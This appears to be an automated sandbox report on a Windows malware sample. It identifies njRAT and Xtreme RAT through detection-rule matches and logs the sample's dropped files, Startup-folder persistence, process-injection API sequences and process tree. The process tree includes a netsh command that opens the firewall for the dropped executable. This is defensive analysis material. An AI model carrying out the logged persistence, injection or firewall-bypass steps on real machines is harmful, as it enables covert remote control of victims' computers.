                Source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: RAT_Xtreme (date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme)
                Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Xtreme_Sep17_1 (date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: xtremrat (date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0)
                Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_Xtreme (date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme)
                Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Xtreme_Sep17_1 (date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: xtremrat (date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0)
                Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp, type: MEMORY. Matched rule: xtremrat (date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0)
                Source: 00000000.00000000.291223895.0000000010056000.00000008.00020000.sdmp, type: MEMORY. Matched rule: xtremrat (date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0)
                Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, type: MEMORY. Matched rule: RAT_Xtreme (date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme)
                Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, type: MEMORY. Matched rule: xtremrat (date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0)
                Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 00000001.00000002.304153426.0000000010048000.00000040.00000001.sdmp, type: MEMORY. Matched rule: xtremrat (date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0)
                Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, type: MEMORY. Matched rule: RAT_Xtreme (date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme)
                Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, type: MEMORYMatched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
                Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
                Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
                Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
                Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                Source: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, type: MEMORYMatched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
                Source: 00000001.00000000.293164908.0000000010048000.00000040.00000001.sdmp, type: MEMORYMatched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
                Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
                Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORYMatched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
                Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
                Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORYMatched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
                Source: 00000000.00000000.291215045.0000000010048000.00000080.00020000.sdmp, type: MEMORYMatched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
                Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
                Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPEDMatched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
                Source: C:\Windows\SysWOW64\562Server.exe, type: DROPPEDMatched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
                Source: C:\Windows\SysWOW64\562Server.exe, type: DROPPEDMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPEDMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                Source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPEDMatched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
                Source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPEDMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeFile created: C:\Windows\SysWOW64\562Server.exe.exeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 100037AC appears 177 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 10003B94 appears 94 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 10003A34 appears 95 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 10006D04 appears 88 times
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeCode function: String function: 100037AC appears 177 times
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeCode function: String function: 10003B94 appears 94 times
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeCode function: String function: 10003A34 appears 95 times
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeCode function: String function: 10006D04 appears 88 times
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeCode function: 0_2_1000649C NtdllDefWindowProc_A,0_2_1000649C
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeCode function: 0_2_100064F4 NtdllDefWindowProc_A,0_2_100064F4
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeCode function: 0_2_1000BD14 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_1000BD14
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeCode function: 0_2_1000BD60 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_1000BD60
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeCode function: 0_2_10008568 VirtualFree,WriteFile,UnhookWindowsHookEx,SetFilePointer,GetFileSize,ReadFile,SetFilePointer,SetFileAttributesW,DeleteFileW,CreateFileW,WriteFile,CloseHandle,GetModuleHandleA,SetWindowsHookExW,UnhookWindowsHookEx,UnhookWindowsHookEx,GetModuleHandleA,SetWindowsHookExW,WriteFile,SetFilePointer,SetEndOfFile,NtdllDefWindowProc_A,0_2_10008568
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeCode function: 0_2_1000AF50 NtdllDefWindowProc_A,0_2_1000AF50
                Source: C:\Users\user\AppData\Local\Temp\System.exeCode function: 8_2_04C01D72 NtQuerySystemInformation,8_2_04C01D72
                Source: C:\Users\user\AppData\Local\Temp\System.exeCode function: 8_2_04C01D37 NtQuerySystemInformation,8_2_04C01D37
                Source: C:\Windows\SysWOW64\562Server.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\562Server.exe.logJump to behavior
                Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@17/7@34/0
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeCode function: 0_2_100051E8 FindResourceW,SizeofResource,LoadResource,LockResource,FreeResource,0_2_100051E8
                Source: 7FW4ce2RDy.exeVirustotal: Detection: 83%
                Source: 7FW4ce2RDy.exeReversingLabs: Detection: 93%
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\7FW4ce2RDy.exe 'C:\Users\user\Desktop\7FW4ce2RDy.exe'
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeProcess created: C:\Windows\SysWOW64\562Server.exe 'C:\Windows\system32\562Server.exe'
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 564
                Source: C:\Windows\SysWOW64\562Server.exeProcess created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe'
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 512
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE
                Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe' ..
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe' ..
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe' ..
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exeJump to behavior
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeProcess created: C:\Windows\SysWOW64\562Server.exe 'C:\Windows\system32\562Server.exe' Jump to behavior
                Source: C:\Windows\SysWOW64\562Server.exeProcess created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe' Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLEJump to behavior
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeFile created: C:\Users\user\AppData\Local\Temp\x.htmlJump to behavior
                Source: C:\Windows\SysWOW64\562Server.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\562Server.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Windows\SysWOW64\562Server.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3156:120:WilError_01
                Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\HgDdsuTdPERSIST
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exeMutant created: \Sessions\1\BaseNamedObjects\HgDdsuTd
                Source: C:\Windows\SysWOW64\562Server.exeMutant created: \Sessions\1\BaseNamedObjects\301b5fcf8ce2fab8868e80b6c1f912fe
                Source: C:\Users\user\AppData\Local\Temp\System.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\562Server.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior

Data Obfuscation:

.NET source code contains potential unpacker
Source: 562Server.exe.0.dr, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: System.exe.4.dr, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.562Server.exe.1d0000.0.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.562Server.exe.1d0000.0.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 301b5fcf8ce2fab8868e80b6c1f912fe.exe.8.dr, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.System.exe.3e0000.0.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.System.exe.3e0000.0.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.System.exe.d50000.0.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.2.System.exe.d50000.0.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.0.System.exe.3e0000.0.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.System.exe.3e0000.0.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 20.2.System.exe.240000.0.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 20.0.System.exe.240000.0.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000C038 push 1000C064h; ret 0_2_1000C05C
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000619C push 100061D4h; ret 0_2_100061CC
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_100051A0 push 100051CCh; ret 0_2_100051C4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_100099C0 push 100099ECh; ret 0_2_100099E4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000A240 push 1000A26Ch; ret 0_2_1000A264
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_100052B0 push 100052FCh; ret 0_2_100052F4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_10004AF8 push 10004B49h; ret 0_2_10004B41
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000AB30 push 1000AB68h; ret 0_2_1000AB60
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000AB74 push 1000ABA0h; ret 0_2_1000AB98
